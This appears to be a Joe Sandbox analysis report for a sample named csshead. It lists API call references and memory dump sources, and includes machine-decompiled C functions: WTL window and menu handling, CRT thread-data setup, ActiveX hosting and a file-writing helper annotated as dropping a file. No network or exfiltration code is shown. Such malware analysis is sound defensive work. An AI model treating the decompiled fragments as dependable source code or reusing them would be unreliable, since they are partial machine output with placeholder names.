    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • GetActiveWindow.USER32 ref: 00410EDF
    • GetWindowThreadProcessId.USER32(00000000), ref: 00410EE6
    • GetCurrentProcessId.KERNEL32 ref: 00410EEC
    • IsWindowEnabled.USER32(?), ref: 00410EFD
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • lstrlen.KERNEL32(?,?,00000000,?,0043347C), ref: 00412A33
    • SetTextColor.GDI32(00000000,?), ref: 00412A5B
    • DrawTextA.USER32(00000000,?,00000000,?,?), ref: 00412A81
    • DrawTextA.USER32(0000002C,00000001,000000FF,?,?), ref: 00412AB1
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • IsWindowVisible.USER32(?), ref: 0041E81B
    • ShowWindow.USER32(?,00000001), ref: 0041E836
    • GetClientRect.USER32(?,?), ref: 0041E86B
      • Part of subcall function 00418760: SendMessageA.USER32(?,00000005,00000000,00000000), ref: 00418796
      • Part of subcall function 00418760: InvalidateRect.USER32(?,00000000,00000001), ref: 004187A4
      • Part of subcall function 00418760: GetWindowRect.USER32(?,?), ref: 004187C9
      • Part of subcall function 00418760: SendMessageA.USER32(?,00000005,00000000,00000000), ref: 004187FE
      • Part of subcall function 00418760: GetWindowRect.USER32(?,?), ref: 00418823
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?,00000014), ref: 0041E8A3
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • IsProcessorFeaturePresent.KERNEL32(0000000C,00421EA0,?,?,004124FE), ref: 00421E12
    • RtlAllocateHeap.NTDLL(00000000), ref: 00421E44
    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00421E5A
    • HeapFree.KERNEL32(00000000,?,?,?,?,?,004124FE), ref: 00421E6A
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • __getptd.LIBCMT ref: 00425510
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
    • __amsg_exit.LIBCMT ref: 00425530
      • Part of subcall function 0042C08B: __amsg_exit.LIBCMT ref: 0042C0AD
      • Part of subcall function 0042C08B: RtlEnterCriticalSection.NTDLL(?), ref: 0042C0B5
    • InterlockedDecrement.KERNEL32(?), ref: 0042555D
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    • InterlockedIncrement.KERNEL32(00441D00), ref: 00425588
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			// Editor annotation: a "write whole buffer to a new file" helper: __eax = path, __edx = data,
    			// __ecx = length. The __eax/__edx/__ecx parameter passing is the Borland/Delphi register
    			// convention, not the MSVC thiscall/cdecl used by the WTL code above; together with this
    			// snapshot's different section layout (0x401000 listed with protection 0x40, PAGE_EXECUTE_READWRITE),
    			// it suggests a different image at the same base in the second snapshot. Returns -1 (an
    			// all-ones LongBool True) only when every byte was written, 0 otherwise; FlushFileBuffers
    			// forces the dropped file to disk before returning. This is the one file-write primitive in this section.
    			E0040485C(CHAR* __eax, long __ecx, void* __edx) {
    				CHAR* _v8;                       // path
    				void* _v12;                      // data
    				long _v16;                       // length
    				intOrPtr _v20;                   // result
    				void* _v24;                      // file handle
    				long _v28;                       // bytes written
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v20 = 0;
    				_v24 = CreateFileA(_v8, 0x40000000, 0, 0, 2, 0x80, 0);   // GENERIC_WRITE, no sharing, CREATE_ALWAYS (overwrites), FILE_ATTRIBUTE_NORMAL
    				if(_v24 != 0xffffffff) {                                  // INVALID_HANDLE_VALUE
    					if(WriteFile(_v24, _v12, _v16,  &_v28, 0) != 0 && _v28 == _v16) {   // success only on a complete write
    						_v20 = 0xffffffff;
    					}
    					FlushFileBuffers(_v24);
    					CloseHandle(_v24);
    				}
    				return _v20;
    			}
    0x00404862
    0x00404865
    0x00404868
    0x0040486d
    0x0040488c
    0x00404893
    0x004048af
    0x004048b9
    0x004048b9
    0x004048c4
    0x004048ce
    0x004048ce
    0x004048da

    APIs
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404886
    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004048A7
    • FlushFileBuffers.KERNEL32(000000FF), ref: 004048C4
    • CloseHandle.KERNEL32(000000FF), ref: 004048CE
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • GetLastError.KERNEL32(?,00000000,004251BD,00422AA1,?,?,00417F96,00000009), ref: 00425E76
      • Part of subcall function 00425D30: TlsGetValue.KERNEL32(00000000,00425E89,?,?,00417F96,00000009), ref: 00425D39
      • Part of subcall function 00425D30: RtlDecodePointer.NTDLL ref: 00425D4B
      • Part of subcall function 00425D30: TlsSetValue.KERNEL32(00000000,?,?,00417F96,00000009), ref: 00425D5A
    • SetLastError.KERNEL32(00000000,?,?,00417F96,00000009), ref: 00425EE0
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
    • RtlDecodePointer.NTDLL(00000000), ref: 00425EB2
    • GetCurrentThreadId.KERNEL32 ref: 00425EC8
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
      • Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(00436FF4,0043CE18,00000008,00425EC6,00000000,00000000,?,?,00417F96,00000009), ref: 00425DCF
      • Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetTopWindow.USER32 ref: 0041FC14
    • SendMessageA.USER32(00000000,?,?,?), ref: 0041FC38
    • GetTopWindow.USER32(00000000), ref: 0041FC43
    • GetWindow.USER32(00000000,00000002), ref: 0041FC65
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 69%
    			// Editor annotation: statically linked MSVC CRT _getptd_noexit, not sample logic. It fetches
    			// the calling thread's per-thread data block (_tiddata, 0x214 bytes) from FLS/TLS, allocating
    			// and initialising one on first use, and preserves the caller's last-error value around the
    			// work. *0x44204c = __flsindex; the calls through decoded pointers (*0x4331bc and the pointer
    			// returned by L00425D30) are the EncodePointer-protected FlsGetValue/FlsSetValue entries.
    			E00425E72(void* __ebx, void* __fp0) {
    				void* __edi;
    				void* __esi;
    				long _t3;
    				void* _t9;
    				long _t12;
    				long _t19;
    				long* _t20;
    
    				_t3 = GetLastError();                                         // save the caller's last error
    				_push( *0x44204c);                                            // __flsindex
    				_t19 = _t3;
    				_t20 =  *((intOrPtr*)(L00425D30()))();                        // ptd = FlsGetValue(__flsindex)
    				if(_t20 == 0) {
    					_t20 = E0042A124(1, 0x214);                               // _calloc_crt(1, sizeof(_tiddata))
    					if(_t20 != 0) {
    						_t9 =  *((intOrPtr*)( *0x4331bc()))( *0x442c70,  *0x44204c, _t20);   // FlsSetValue(__flsindex, ptd)
    						_t23 = _t9;
    						if(_t9 == 0) {
    							E00422804(_t20);                                  // _free_crt(ptd) when the slot cannot be set
    							_t20 = 0;
    							__eflags = 0;
    						} else {
    							_push(0);
    							_push(_t20);
    							L00425DBE(__ebx, _t19, _t20, _t23, __fp0);         // _initptd(ptd, NULL)
    							_t12 = GetCurrentThreadId();
    							_t20[1] = _t20[1] | 0xffffffff;                   // ptd->_thandle = (uintptr_t)-1
    							 *_t20 = _t12;                                    // ptd->_tid
    						}
    					}
    				}
    				SetLastError(_t19);                                           // restore it: the lookup is transparent to the caller
    				return _t20;
    			}
    0x00425e76
    0x00425e7c
    0x00425e82
    0x00425e8b
    0x00425e8f
    0x00425e9d
    0x00425ea3
    0x00425eb8
    0x00425eba
    0x00425ebc
    0x00425ed7
    0x00425edd
    0x00425edd
    0x00425ebe
    0x00425ebe
    0x00425ec0
    0x00425ec1
    0x00425ec8
    0x00425ece
    0x00425ed2
    0x00425ed2
    0x00425ebc
    0x00425ea3
    0x00425ee0
    0x00425eea

    APIs
    • GetLastError.KERNEL32(?,?,004251BD,004277BA,00000000), ref: 00425E76
      • Part of subcall function 00425D30: TlsGetValue.KERNEL32(?,00425E89), ref: 00425D39
      • Part of subcall function 00425D30: DecodePointer.KERNEL32 ref: 00425D4B
      • Part of subcall function 00425D30: TlsSetValue.KERNEL32(00000000), ref: 00425D5A
    • SetLastError.KERNEL32(00000000), ref: 00425EE0
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000,00000001,00000214), ref: 0042A14C
    • DecodePointer.KERNEL32(00000000), ref: 00425EB2
    • GetCurrentThreadId.KERNEL32 ref: 00425EC8
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC), ref: 0042282C
      • Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043CE18,00000008,00425EC6,00000000,00000000), ref: 00425DCF
      • Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 91%
    			// Editor annotation: matches WTL's CCommandBarCtrl::OnDropDown, the TBN_DROPDOWN handler that
    			// opens a top-level menu. _a8 = NMTOOLBAR* (+0 hwndFrom, +0xc iItem), *_a12 = bHandled,
    			// *(this+4) = m_hWnd, *(this+0x58) = m_dwExtendedStyle (4 = CBR_EX_ALTFOCUSMODE),
    			// *(this+0xac) = m_hWndFocus, 0x419 = TB_COMMANDTOINDEX.
    			E004171E0(void* __ecx, intOrPtr* _a8, long* _a12) {
    				long _t19;
    				intOrPtr* _t25;
    				void* _t33;
    
    				_t25 = _a8;
    				_t33 = __ecx;
    				if( *_t25 ==  *((intOrPtr*)(__ecx + 4))) {                     // notification comes from our own toolbar
    					if(GetFocus() !=  *(_t33 + 4)) {                            // TakeFocus(): remember the previous owner in alt-focus mode
    						if(( *(_t33 + 0x58) & 0x00000004) != 0 &&  *((intOrPtr*)(_t33 + 0xac)) == 0) {
    							 *((intOrPtr*)(_t33 + 0xac)) = GetFocus();
    						}
    						SetFocus( *(_t33 + 4));
    					}
    					_t19 = SendMessageA( *(_t33 + 4), 0x419,  *(_t25 + 0xc), 0);   // nIndex = CommandToIndex(pNMToolBar->iItem)
    					 *(_t33 + 0x84) =  *(_t33 + 0x84) & 0x000000cf;              // clear the context-menu / escape-pressed bit flags
    					_push(1);
    					L00416ED0(_t33, _t19);                                       // DoPopupMenu(nIndex, bAnimate = true); this subcall registers WTL_CmdBar_InternalAutoPopupMsg
    					return 0;
    				} else {
    					 *_a12 = 0;                                                  // bHandled = FALSE
    					return 1;
    				}
    			}

    APIs
    • GetFocus.USER32 ref: 0041720A
    • GetFocus.USER32 ref: 00417220
    • SetFocus.USER32(?), ref: 0041722C
    • SendMessageA.USER32(?,00000419,?,00000000), ref: 00417241
      • Part of subcall function 00416ED0: SendMessageA.USER32 ref: 00416F08
      • Part of subcall function 00416ED0: MapWindowPoints.USER32(?,00000000,?,00000001), ref: 00416F2D
      • Part of subcall function 00416ED0: MapWindowPoints.USER32(?,00000000,0000041D,00000002), ref: 00416F3C
      • Part of subcall function 00416ED0: GetSubMenu.USER32(?,?), ref: 00416F7D
      • Part of subcall function 00416ED0: SendMessageA.USER32 ref: 00416FB0
      • Part of subcall function 00416ED0: SendMessageA.USER32(?,00000403,?,00000001), ref: 00416FC8
      • Part of subcall function 00416ED0: SendMessageA.USER32(?,00000448,?,00000000), ref: 00416FD6
      • Part of subcall function 00416ED0: SendMessageA.USER32(?,00000403,?,00000000), ref: 00417026
      • Part of subcall function 00416ED0: GetFocus.USER32 ref: 0041702B
      • Part of subcall function 00416ED0: SendMessageA.USER32(?,00000448,000000FF,00000000), ref: 0041703F
      • Part of subcall function 00416ED0: PeekMessageA.USER32(?,?,00000201,00000201,00000000), ref: 00417083
      • Part of subcall function 00416ED0: PtInRect.USER32(?,?,?), ref: 00417098
      • Part of subcall function 00416ED0: PeekMessageA.USER32(?,?,00000201,00000201,00000001), ref: 004170B7
      • Part of subcall function 00416ED0: EnterCriticalSection.KERNEL32(-00000010,?,?,?,?,?,?,00000417,?,?), ref: 004170DB
      • Part of subcall function 00416ED0: RegisterWindowMessageA.USER32(WTL_CmdBar_InternalAutoPopupMsg,?,?,?,?,?,?,00000417,?,?), ref: 004170EF
      • Part of subcall function 00416ED0: LeaveCriticalSection.KERNEL32(-00000010,?,?,?,?,?,?,00000417,?,?), ref: 004170FB
      • Part of subcall function 00416ED0: PostMessageA.USER32(?,00000000,?,00000000), ref: 0041711C
      • Part of subcall function 00416ED0: PostMessageA.USER32(?,00000100,00000028,00000000), ref: 00417140
      • Part of subcall function 00416ED0: SendMessageA.USER32(?,00000448,?,00000000), ref: 00417195
      • Part of subcall function 00416ED0: SendMessageA.USER32(?,00000449,00000001,00000000), ref: 004171A4
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E0041E9C0(void* __ecx, struct HWND__* _a4) {
    				int _t10;
    				void* _t25;
    
    				_t18 = _a4;
    				_t25 = __ecx;
    				_t10 = IsWindow(_a4);
    				if(_t10 != 0) {
    					if(IsWindow( *(_t25 + 0xc0)) != 0 &&  *((intOrPtr*)(_t25 + 0xd0)) == GetWindowLongA( *(_t25 + 0xc0), 0xfffffffc) && SetWindowLongA( *(_t25 + 0xc0), 0xfffffffc,  *(_t25 + 0xd8)) != 0) {
    						 *(_t25 + 0xd8) =  *0x4334dc;
    						 *(_t25 + 0xc0) = 0;
    					}
    					return E004124F0(_t25 + 0xc0, _t18);
    				} else {
    					return _t10;
    				}
    			}

    APIs
    • IsWindow.USER32(0000E900), ref: 0041E9D0
    • IsWindow.USER32(?), ref: 0041E9E3
    • GetWindowLongA.USER32(?,000000FC), ref: 0041E9F8
    • SetWindowLongA.USER32(?,000000FC,?), ref: 0041EA12
      • Part of subcall function 004124F0: GetCurrentProcess.KERNEL32 ref: 00412525
      • Part of subcall function 004124F0: FlushInstructionCache.KERNEL32(00000000), ref: 0041252C
      • Part of subcall function 004124F0: SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041253E
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E004046A0(void* __ecx) {
    				void* _t22;
    
    				_t22 = __ecx;
    				do {
    					WaitForSingleObject( *(_t22 + 0x3c), 0xffffffff);
    					do {
    						 *((char*)(_t22 + 0x40)) = 0;
    					} while (WaitForSingleObject( *(_t22 + 0x3c),  *(_t22 + 0x44)) == 0);
    				} while ( *((intOrPtr*)(_t22 + 0x40)) != 0 ||  *((intOrPtr*)(_t22 + 8)) != 0);
    				if(CloseHandle( *(_t22 + 0x3c)) != 0) {
    					 *(_t22 + 0x3c) = 0;
    				}
    				return PostThreadMessageA( *(_t22 + 0x30), 0x12, 0, 0);
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004046B6
    • WaitForSingleObject.KERNEL32(?,?), ref: 004046C3
    • CloseHandle.KERNEL32(?), ref: 004046D7
    • PostThreadMessageA.USER32(?,00000012,00000000,00000000), ref: 004046EC
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • LoadLibraryA.KERNEL32(?), ref: 00410AE6
    • GetProcAddress.KERNEL32(00000000,00436270), ref: 00410B11
    • FreeLibrary.KERNEL32(00000000), ref: 00410B21
    • FreeLibrary.KERNEL32(00000000), ref: 00410B32
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 85%
    			E0040CED0(intOrPtr* __ecx, RECT* _a4) {
    				char _v12;
    				RECT* _v16;
    				intOrPtr* _v20;
    				intOrPtr* _v24;
    				intOrPtr* _v28;
    				intOrPtr _v32;
    				intOrPtr* _v36;
    				intOrPtr* _v40;
    				RECT* _v48;
    				RECT* _v56;
    				intOrPtr _v60;
    				intOrPtr* _v72;
    				char _v76;
    				RECT* _v92;
    				intOrPtr* _v104;
    				RECT* _t104;
    				intOrPtr* _t107;
    				intOrPtr* _t113;
    				RECT* _t116;
    				intOrPtr* _t119;
    				RECT* _t120;
    				RECT* _t123;
    				intOrPtr* _t125;
    				RECT* _t130;
    				RECT* _t132;
    				intOrPtr* _t138;
    				intOrPtr* _t142;
    				RECT* _t150;
    				RECT* _t152;
    				intOrPtr* _t155;
    				RECT* _t156;
    				intOrPtr* _t159;
    				RECT* _t163;
    				intOrPtr* _t166;
    				RECT* _t167;
    				intOrPtr* _t170;
    				RECT* _t171;
    				RECT* _t172;
    				RECT* _t175;
    				intOrPtr* _t180;
    				RECT* _t186;
    				intOrPtr* _t189;
    				intOrPtr* _t195;
    				void* _t199;
    				RECT* _t200;
    				struct tagRECT* _t202;
    				intOrPtr* _t203;
    				void* _t204;
    				char _t205;
    				intOrPtr _t244;
    				void* _t293;
    				RECT** _t294;
    				RECT* _t297;
    				intOrPtr* _t298;
    				RECT* _t299;
    				RECT** _t301;
    				intOrPtr* _t302;
    				intOrPtr* _t303;
    				intOrPtr* _t304;
    
    				_t299 = _a4;
    				_t298 = __ecx;
    				if(_t299 != 0) {
    					if( *((intOrPtr*)(__ecx + 0x60)) != _t299) {
    						 *((intOrPtr*)( *((intOrPtr*)(_t299->left + 4))))(_t299);
    						_t195 =  *((intOrPtr*)(__ecx + 0x60));
    						if(_t195 != 0) {
    							 *((intOrPtr*)( *((intOrPtr*)( *_t195 + 8))))(_t195);
    						}
    						 *(_t298 + 0x60) = _t299;
    					}
    					_t294 = _t298 + 0x64;
    					_t200 = 0;
    					 *((intOrPtr*)( *(_t299->left)))(_t299, 0x435ef0, _t294, _t293, _t199);
    					_t104 =  *_t294;
    					if(_t104 == 0) {
    						L55:
    						_v16 = 0;
    						 *((intOrPtr*)( *( *_t299)))(_t299, 0x435e04,  &_v16);
    						_t107 = _v28;
    						if(_t107 != 0) {
    							_t99 =  *_t298 + 0x10; // 0x122
    							 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 0xc))))(_t107,  *((intOrPtr*)( *_t99))());
    							_t113 = _v36;
    							goto L57;
    						}
    					} else {
    						_t301 = _t298 + 0xa0;
    						 *((intOrPtr*)( *((intOrPtr*)(_t104->left + 0x58))))(_t104, 1, _t301);
    						if(( *_t301 & 0x00020000) != 0) {
    							_t186 =  *_t294;
    							 *((intOrPtr*)( *((intOrPtr*)(_t186->left + 0xc))))(_t186, _v32);
    							_t189 = _v40;
    							if(_t189 != 0) {
    								 *((intOrPtr*)( *((intOrPtr*)( *_t189 + 8))))(_t189);
    							}
    						}
    						if(_v16 != _t200) {
    							L32:
    							if(( *_t301 & 0x00020000) == 0) {
    								_t155 =  *((intOrPtr*)( *((intOrPtr*)( *_t298 + 0x10))))();
    								_v16 = 0;
    								if(_t155 != 0) {
    									 *((intOrPtr*)( *((intOrPtr*)( *_t155))))(_t155, 0x435dc4,  &_v16);
    								}
    								_t156 =  *_t294;
    								 *((intOrPtr*)( *((intOrPtr*)(_t156->left + 0xc))))(_t156, _v16);
    								_t159 = _v24;
    								if(_t159 != 0) {
    									 *((intOrPtr*)( *((intOrPtr*)( *_t159 + 8))))(_t159);
    								}
    							}
    							_t116 =  *_t294;
    							_t302 = _t298 + 0x70;
    							 *(_t298 + 0x90) = 0;
    							_t200 =  *((intOrPtr*)( *(_t116->left)))(_t116, 0x435ee0, _t302);
    							if(_t200 >= 0) {
    								 *(_t298 + 0x90) = 7;
    							} else {
    								_t150 =  *_t294;
    								_t200 =  *((intOrPtr*)( *(_t150->left)))(_t150, 0x435ed0, _t302);
    								if(_t200 < 0) {
    									_t152 =  *_t294;
    									_t200 =  *((intOrPtr*)( *(_t152->left)))(_t152, 0x435ec0, _t302);
    									if(_t200 >= 0) {
    										 *(_t298 + 0x90) = 1;
    									}
    								} else {
    									 *(_t298 + 0x90) = 3;
    								}
    							}
    							_t119 =  *((intOrPtr*)( *((intOrPtr*)( *_t298 + 0x10))))();
    							_v48 = 0;
    							if(_t119 != 0) {
    								 *((intOrPtr*)( *((intOrPtr*)( *_t119))))(_t119, 0x435e54,  &_v48);
    							}
    							_t120 =  *_t294;
    							 *((intOrPtr*)( *((intOrPtr*)(_t120->left + 0x4c))))(_t120, _v48, _t298 + 0x9c);
    							_t303 =  *_t302;
    							if(_t303 != 0) {
    								 *((intOrPtr*)( *((intOrPtr*)( *_t303 + 0x1c))))(_t303, 1, 0, _v60);
    							}
    							_t123 =  *_t294;
    							 *((intOrPtr*)( *((intOrPtr*)(_t123->left + 0x14))))(_t123, L"AXWIN", 0);
    							if(( *(_t298 + 0xa0) & 0x00000400) == 0) {
    								_t202 = _t298 + 0xb4;
    								GetClientRect( *(_t298 + 4), _t202);
    								_t203 = _t298 + 0xa4;
    								_t304 = _t298 + 0xac;
    								 *_t304 =  *((intOrPtr*)(_t298 + 0xbc)) - _t202->left;
    								 *((intOrPtr*)(_t298 + 0xb0)) =  *((intOrPtr*)(_t298 + 0xc0)) -  *((intOrPtr*)(_t298 + 0xb8));
    								E0040A4A0(_t304, _t203);
    								_t130 =  *_t294;
    								 *((intOrPtr*)( *((intOrPtr*)(_t130->left + 0x44))))(_t130, 1, _t203);
    								_t132 =  *_t294;
    								 *((intOrPtr*)( *((intOrPtr*)(_t132->left + 0x48))))(_t132, 1, _t203);
    								L0040A420(_t203, _t304);
    								_t204 = _t298 + 0xb4;
    								 *((intOrPtr*)(_t298 + 0xbc)) =  *(_t298 + 0xb4) +  *_t304;
    								 *((intOrPtr*)(_t298 + 0xc0)) =  *((intOrPtr*)(_t298 + 0xb8)) +  *((intOrPtr*)(_t298 + 0xb0));
    								_t138 =  *((intOrPtr*)( *((intOrPtr*)( *_t298 + 0x10))))();
    								_v92 = 0;
    								if(_t138 != 0) {
    									 *((intOrPtr*)( *((intOrPtr*)( *_t138))))(_t138, 0x435dc4,  &_v76);
    								}
    								_t297 =  *_t294;
    								_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t297->left + 0x2c))))(_t297, 0xfffffffb, 0, _v76, 0,  *(_t298 + 4), _t204);
    								RedrawWindow( *(_t298 + 4), 0, 0, 0x507);
    								_t142 = _v104;
    								if(_t142 != 0) {
    									 *((intOrPtr*)( *((intOrPtr*)( *_t142 + 8))))(_t142);
    								}
    							}
    							_t125 = _v72;
    							if(_t125 != 0) {
    								 *((intOrPtr*)( *((intOrPtr*)( *_t125 + 8))))(_t125);
    							}
    							_t299 = _v56;
    							goto L55;
    						} else {
    							_t163 =  *_t294;
    							_v16 = _t200;
    							if(_t163 == 0) {
    								L18:
    								_t205 = _v12;
    								if(_t205 == 0) {
    									goto L32;
    								} else {
    									L0040B2C0( &_v12,  *_t294);
    									_t166 = _v16;
    									if(_t166 == 0) {
    										goto L30;
    									} else {
    										_t200 =  *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x14))))(_t166, _t205);
    										_t170 = _v20;
    										if(_t170 != 0) {
    											 *((intOrPtr*)( *((intOrPtr*)( *_t170 + 8))))(_t170);
    										}
    										goto L22;
    									}
    								}
    							} else {
    								 *((intOrPtr*)( *(_t163->left)))(_t163, 0x435dd4,  &_v16);
    								_t180 = _v28;
    								if(_t180 == 0) {
    									goto L18;
    								} else {
    									_t244 = _v24;
    									if(_t244 == 0) {
    										_t200 =  *((intOrPtr*)( *((intOrPtr*)( *_t180 + 0x20))))(_t180);
    									} else {
    										_t200 =  *((intOrPtr*)( *((intOrPtr*)( *_t180 + 0x14))))(_t180, _t244);
    									}
    									L22:
    									if(_t200 >= 0) {
    										L30:
    										_t167 = _v16;
    										if(_t167 != 0) {
    											 *((intOrPtr*)( *((intOrPtr*)(_t167->left + 8))))(_t167);
    										}
    										goto L32;
    									} else {
    										if(( *_t301 & 0x00020000) != 0) {
    											_t175 =  *_t294;
    											 *((intOrPtr*)( *((intOrPtr*)(_t175->left + 0xc))))(_t175, 0);
    										}
    										 *_t301 = 0;
    										_t171 =  *_t294;
    										if(_t171 != 0) {
    											 *_t294 = 0;
    											 *((intOrPtr*)( *((intOrPtr*)(_t171->left + 8))))(_t171);
    										}
    										_t172 =  *(_t298 + 0x60);
    										if(_t172 != 0) {
    											 *(_t298 + 0x60) = 0;
    											 *((intOrPtr*)( *((intOrPtr*)(_t172->left + 8))))(_t172);
    										}
    										_t113 = _v24;
    										L57:
    										if(_t113 != 0) {
    											 *((intOrPtr*)( *((intOrPtr*)( *_t113 + 8))))(_t113);
    										}
    									}
    								}
    							}
    						}
    					}
    					return _t200;
    				} else {
    					return 0;
    				}
    			}

    APIs
    • GetClientRect.USER32(?,?), ref: 0040D1AC
      • Part of subcall function 0040A4A0: GetDC.USER32(00000000), ref: 0040A4CA
      • Part of subcall function 0040A4A0: GetDeviceCaps.GDI32(00000000,00000058), ref: 0040A4DB
      • Part of subcall function 0040A4A0: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040A4E4
      • Part of subcall function 0040A4A0: ReleaseDC.USER32(00000000,00000000), ref: 0040A4EB
      • Part of subcall function 0040A4A0: MulDiv.KERNEL32(000009EC,?,?), ref: 0040A504
